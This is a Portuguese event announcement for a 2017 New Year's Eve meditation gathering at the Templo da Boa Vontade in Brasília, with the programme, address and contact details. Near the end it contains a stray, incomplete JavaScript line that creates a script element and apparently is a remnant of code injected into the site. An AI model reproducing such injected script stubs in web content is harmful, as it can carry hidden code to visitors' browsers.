Réveillon Espiritual

Ao encerrar mais um ano muitas expectativas são reavaliadas para o início de um novo ciclo. Essa avaliação requer momento e lugar apropriados para pensar sobre o que cada um alcançou, o que deixou de realizar e as mudanças que deseja traçar para melhorar a  proposta de vida pessoal, profissional e familiar. Para muitos é hora de desacelerar, cobrar-se menos e ouvir-se mais, em momentos de reflexão.

O Templo da Boa Vontade estará aberto a todos, oferecendo ambiente de tranquilidade, para meditação e acolhimento, onde as pessoas podem reabastecer suas energias para o novo ano. A proposta é saudar a chegada de 2017 durante o Réveillon Espiritual que ocorrerá no local.

Uma programação especial foi preparada para quem quer iniciar o novo ano em profunda interiorização. Na Nave (ambiente principal do TBV), a partir das 22 horas, músicas elevadas conduzirão os visitantes a um momento de elevação espiritual.

Além de realizar a caminhada pela Espiral —ação que simboliza a busca por um ponto de equilíbrio — com uma rosa branca nas mãos, representando a Paz. Minutos antes da chegada de 2017, os presentes acompanharão as palavras fraternas e ecumênicas do fundador do Templo da Boa Vontade, José de Paiva Netto.

 

Serviço: Réveillon Espiritual no Templo da Boa Vontade

Data: 31 de dezembro

Horário: A partir das 22 horas

Local: Templo da Boa Vontade (Quadra 915 Sul — Brasília/DF)

Entrada: Franca

Informações: (61) 3114-1070 — www.tbv.com.br

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário